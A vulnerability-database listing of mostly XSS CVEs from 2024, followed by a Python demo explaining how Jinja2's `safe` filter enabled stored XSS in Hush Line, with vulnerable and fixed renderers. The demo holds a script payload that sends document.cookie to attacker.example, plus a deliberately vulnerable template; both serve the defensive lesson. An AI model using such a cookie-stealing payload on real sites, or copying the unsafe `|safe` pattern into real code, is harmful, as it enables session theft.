Total: 30576 CVEs
CVE | Vendors | Products | Updated | CVSS v2 | CVSS v3 | Description
---|---|---|---|---|---|---
CVE-2024-38527 | | | 2024-11-21 | N/A | 5.4 MEDIUM | ZenUML is a JavaScript-based diagramming tool that requires no server, using Markdown-inspired text definitions and a renderer to create and modify sequence diagrams. Markdown-based comments in the ZenUML diagram syntax are susceptible to cross-site scripting (XSS). The comment feature lets the user attach small notes for reference, entered as Markdown, so common Markdown features such as `**` for bold text are available. However, the Markdown text is not sanitized before rendering, so an attacker can supply a malicious comment payload that leads to XSS. This puts applications that use ZenUML unsandboxed at risk of arbitrary JavaScript execution when rendering user-controlled diagrams. This vulnerability was patched in version 3.23.25,
CVE-2024-38521 | 1 Hushline | 1 Hush Line | 2024-11-21 | N/A | 8.8 HIGH | Hush Line is a free and open-source anonymous-tip-line-as-a-service for organizations or individuals. There is a stored XSS in the Inbox: the input is displayed through the Jinja2 `safe` filter, which disables autoescaping, so it is rendered as raw HTML on display. This issue has been patched in version 0.1.0.
CVE-2024-38507 | 1 Jetbrains | 1 Hub | 2024-11-21 | N/A | 3.5 LOW | In JetBrains Hub before 2024.2.34646, stored XSS via the project description was possible.
CVE-2024-38503 | 1 Apache | 1 Syncope | 2024-11-21 | N/A | 5.4 MEDIUM | When editing a user, group or any other object in the Syncope Console, HTML tags could be added to any text field, leading to potential exploits. The same vulnerability was found in the Syncope Enduser when editing "Personal Information" or "User Requests". Users are recommended to upgrade to version 3.0.8, which fixes this issue.
CVE-2024-38493 | 1 Broadcom | 1 Symantec Privileged Access Management | 2024-11-21 | N/A | 6.1 MEDIUM | A reflected cross-site scripting (XSS) vulnerability exists in the PAM UI web interface. A remote attacker able to convince a PAM user to click a specially crafted link to the PAM UI could execute arbitrary client-side code in the context of the PAM UI.
CVE-2024-38470 | | | 2024-11-21 | N/A | 6.1 MEDIUM | zhimengzhe iBarn v1.5 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the $search parameter at /own.php.
CVE-2024-38454 | 1 Expressionengine | 1 Expressionengine | 2024-11-21 | N/A | 6.1 MEDIUM | ExpressionEngine before 7.4.11 allows XSS.
CVE-2024-38436 | 1 Commugen | 1 Sox 365 | 2024-11-21 | N/A | 6.1 MEDIUM | Commugen SOX 365 – CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting').
CVE-2024-38430 | 1 Matrix-globalservices | 1 Tafnit | 2024-11-21 | N/A | 5.4 MEDIUM | Matrix - CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting').
CVE-2024-38379 | 1 Apache | 1 Allura | 2024-11-21 | N/A | 4.8 MEDIUM | Apache Allura's neighborhood settings are vulnerable to a stored XSS attack. Only neighborhood admins can access these settings, so the risk is limited to configurations where neighborhood admins are not fully trusted. This issue affects Apache Allura from 1.4.0 through 1.17.0. Users are recommended to upgrade to version 1.17.1, which fixes the issue.
CVE-2024-38364 | | | 2024-11-21 | N/A | 2.6 LOW | DSpace is an open-source, turnkey repository application used by more than 2,000 organizations and institutions worldwide to provide durable access to digital resources. In DSpace 7.0 through 7.6.1, when an HTML, XML or JavaScript Bitstream is downloaded, the user's browser may execute any embedded JavaScript. If that embedded JavaScript is malicious, there is a risk of an XSS attack. This vulnerability has been patched in version 7.6.2.
CVE-2024-38357 | | | 2024-11-21 | N/A | 6.1 MEDIUM | TinyMCE is an open source rich text editor. A cross-site scripting (XSS) vulnerability was discovered in TinyMCE's content parsing code. Specially crafted noscript elements containing malicious code were executed when that content was loaded into the editor. This vulnerability has been patched in TinyMCE 7.2.0, TinyMCE 6.8.4 and TinyMCE 5.11.0 LTS by ensuring that content within noscript elements is properly parsed. Users are advised to upgrade. There are no known workarounds for this vulnerability.
CVE-2024-38356 | | | 2024-11-21 | N/A | 6.1 MEDIUM | TinyMCE is an open source rich text editor. A cross-site scripting (XSS) vulnerability was discovered in TinyMCE's content extraction code. When using the `noneditable_regexp` option, specially crafted HTML attributes containing malicious code could be executed when content was extracted from the editor. This vulnerability has been patched in TinyMCE 7.2.0, TinyMCE 6.8.4 and TinyMCE 5.11.0 LTS by ensuring that, when the `noneditable_regexp` option is used, any content within an attribute is verified to match the configured regular expression before being added. Users are advised to upgrade. There are no known workarounds for this vulnerability.
CVE-2024-38354 | 1 Hackmd | 1 Codimd | 2024-11-21 | N/A | 8.1 HIGH | CodiMD allows realtime collaborative markdown notes on all platforms. The notebook feature of Hackmd.io permits the rendering of iframe HTML tags with an improperly sanitized `name` attribute. This enables attackers to perform cross-site scripting (XSS) attacks via DOM clobbering. This vulnerability is fixed in 2.5.4.
CVE-2024-38274 | | | 2024-11-21 | N/A | 6.1 MEDIUM | Insufficient escaping of calendar event titles resulted in a stored XSS risk in the event deletion prompt.
CVE-2024-38156 | 1 Microsoft | 1 Edge | 2024-11-21 | N/A | 6.1 MEDIUM | Microsoft Edge (Chromium-based) Spoofing Vulnerability.
CVE-2024-37961 | | | 2024-11-21 | N/A | 7.1 HIGH | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in codoc.Jp allows Stored XSS. This issue affects codoc: from n/a through 0.9.51.12.
CVE-2024-37960 | | | 2024-11-21 | N/A | 6.5 MEDIUM | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Chris Coyier CodePen Embedded Pens Shortcode allows Stored XSS. This issue affects CodePen Embedded Pens Shortcode: from n/a through 1.0.0.
CVE-2024-37959 | 1 Atlaspolicy | 1 Power Bi Embedded | 2024-11-21 | N/A | 6.5 MEDIUM | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Atlas Public Policy Power BI Embedded for WordPress allows Stored XSS. This issue affects Power BI Embedded for WordPress: from n/a through 1.1.7.
CVE-2024-37958 | 1 Mekshq | 1 Meks Smart Author Widget | 2024-11-21 | N/A | 6.5 MEDIUM | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Meks Meks Smart Author Widget allows Stored XSS. This issue affects Meks Smart Author Widget: from n/a through 1.1.4.
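The Hush Line entry (CVE-2024-38521) describes the most common shape of stored XSS in Python web apps: a value is rendered through Jinja2's `safe` filter, which tells the engine the string is already trusted HTML and switches autoescaping off for it. The example below is added here to show that behaviour concretely; it is not Hush Line's code, and the tip text, template markup and the tiny allowlist are constructed for illustration. It renders the same attacker-controlled tip three ways: through `|safe` (the vulnerable pattern), through plain autoescaping (the fix), and, for the case where a little formatting is genuinely wanted, by escaping everything first and re-enabling only fixed, attribute-free tags before marking the result as `Markup`.

```python
"""Stored-XSS demo: how Jinja2's `safe` filter disables autoescaping.

Constructed example, not Hush Line's code. Requires jinja2 (and its
dependency markupsafe) to be installed.
"""
from jinja2 import Environment
from markupsafe import Markup, escape

# Constructed sample of what an attacker could submit through an anonymous
# tip form and have stored for display in the operator's inbox.
MALICIOUS_TIP = (
    'Heads up <b>boss</b> '
    '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
)

# Autoescaping is on for the whole environment; `|safe` overrides it per value.
env = Environment(autoescape=True)

# Vulnerable: `safe` asserts the stored value is trusted HTML. It is not.
VULNERABLE_TEMPLATE = env.from_string('<div class="tip">{{ tip|safe }}</div>')

# Fixed: let autoescaping turn <, >, &, " and ' into entities; the browser
# then shows the tag as text instead of executing it.
FIXED_TEMPLATE = env.from_string('<div class="tip">{{ tip }}</div>')

# Tags a tip is allowed to keep when limited formatting is wanted (constructed
# allowlist; attribute-free tags only, so nothing can carry an event handler).
ALLOWED_TAGS = ("b", "i")


def render_vulnerable(tip: str) -> str:
    """Render as Hush Line did before 0.1.0: raw HTML reaches the page."""
    return VULNERABLE_TEMPLATE.render(tip=tip)


def render_fixed(tip: str) -> str:
    """Render with autoescaping left in force."""
    return FIXED_TEMPLATE.render(tip=tip)


def render_limited_markup(tip: str) -> str:
    """Escape everything, then re-enable only exact, attribute-free allowed
    tags. Wrapping the result in Markup marks it trusted so the template does
    not double-escape it; because every other character is already escaped,
    no attacker-supplied tag or attribute can survive."""
    escaped = str(escape(tip))
    for tag in ALLOWED_TAGS:
        escaped = escaped.replace(f"&lt;{tag}&gt;", f"<{tag}>")
        escaped = escaped.replace(f"&lt;/{tag}&gt;", f"</{tag}>")
    return FIXED_TEMPLATE.render(tip=Markup(escaped))


def contains_live_script(html: str) -> bool:
    """Demo check: did an unescaped <script> tag survive rendering?"""
    return "<script" in html.lower()


if __name__ == "__main__":
    for label, renderer in (
        ("vulnerable (|safe)", render_vulnerable),
        ("fixed (autoescape)", render_fixed),
        ("limited markup", render_limited_markup),
    ):
        out = renderer(MALICIOUS_TIP)
        print(f"{label:20} live script: {contains_live_script(out)}")
        print("   ", out)
```

The third renderer is deliberately narrow: it never parses attacker HTML, it only un-escapes two exact byte sequences it knows are harmless. Anything richer than that (links, images, user-chosen attributes) belongs to a maintained HTML sanitizer, not to a hand-written filter, and the sanitized output, not the raw input, is what gets marked `safe`.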